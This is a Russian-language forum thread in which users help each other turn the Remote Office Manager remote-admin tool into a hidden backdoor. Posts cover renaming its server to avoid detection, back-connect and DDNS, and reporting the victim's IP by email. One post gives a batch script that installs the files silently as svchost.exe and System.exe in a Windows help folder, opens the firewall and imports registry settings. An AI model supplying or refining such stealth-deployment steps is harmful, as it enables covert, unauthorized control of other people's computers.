эм, для этого и есть бек конект чтоб роутер обходил. Но я тут поглядел фишка в другом. Как доконца разберусь выложу инфу.
Как переимновать файл RomServer.exe? чтобы не палиться? И как настроить DDns? никогда не пользовалься, можете написать инструкцию хоть маленькую или видео А еще проблема... всё сделал вроде, непалиться, всё инсталлируеться... но не могу зайти на сервер... даже в командную строку не коннектит, максимум могу отправить чат сообщение... версия 4.1
спасибо за мануал, разобрался и собрал ром. Все работает и не палится, кроме как в процессах. Добавил отстук ip на мыло и на скрипт. Если кому надо - помогу.
помогите установил четвертый ром 4.1 вот батник mkdir "%SYSTEMROOT%\help\migwiz2" copy /y "AledensoftIpcServer.dll" "%SYSTEMROOT%\help\migwiz2\AledensoftIpcServer.dll" copy /y "HookDrv.dll" "%SYSTEMROOT%\help\migwiz2\HookDrv.dll" copy /y "ROMFUSClient.exe" "%SYSTEMROOT%\help\migwiz2\svchost.exe" copy /y "ROMServer.exe" "%SYSTEMROOT%\help\migwiz2\System.exe" copy /y "ROMwln.dll" "%SYSTEMROOT%\help\migwiz2\ROMwln.dll" "%SYSTEMROOT%\help\migwiz2\System.exe" /silentinstall "%SYSTEMROOT%\help\migwiz2\System.exe" /firewall reg import "settings.reg" regedit /s "settings.reg" "%SYSTEMROOT%/help\migwiz2\System.exe" /start в регистре он почемуто HKEY_LOCAL_MACHINE\SYSTEM\Remote Office Manager\v3.4\Server\Parameters а не 4.1 и строку в сетингсе менял на "FUSClientPath"="C:\\Windows\\Help\\migwiz2\\svchost.exe" и все равно но он не запускается в логах вот что пишет 19-05-2010_18:34:45#T:Invalid exe-file name. хотя в более ранних версиях такого не возникало
долгими пробами и ошибками выяснилось что выложенные здесь файлы ROM отличаются от оригинальных (я сразу обратил внимание на разницу в размере ром сервера и ромфусклиента ,но думал что это от того что их версия 4,0,0 ) видимо знающими людьми они были подкорректированы так что б была возможность их переименовывать поэтому просьба к гуру подкоректируйте файлы для версии 4.1.2 http://depositfiles.com/files/7cj400upl ,заранее всем признателен и если не трудно сделайте видео
Если ты имеешь ввиду файлы из первого поста, то они оригинальные, Скачанные с офф. сайта. А вообще у меня так и не получилось поменять имя процесса ни старых ни в нынешней версии РОМы
вот версия старого рома 4,0,0 это уже готовый http://depositfiles.com/files/wi6linxur они могут переименовываться а здесь просто без регфайла http://depositfiles.com/files/fjmlnclku
нарыл все таки версию 4.0.0 и как оказалось romserver можно переименовать ,НО не работает просмотр экрана и при запуске меняется ветка реестра "FUSClientPath"="C:\\Windows\\Help\\migwiz2\\ROMFUSClient.exe" то есть ROMFUSClient.exe даже изменив имя ,при запуске ROMserver-a востанавливается в ROMFUSClient.exe возможно это в самом реестре надо поправлять, либо сами файлы ROMFUSClient.exe и ROMServer.exe модифицировать подскажите в чем это можно сделать
Не пашет. v.4.1. Значок активный,горит буковка "А"и ! .Жмёшь, движений никаких Что за хрень. Уже все версии попробовал.Кроме последней. Подскажите плиз.Как её запустить.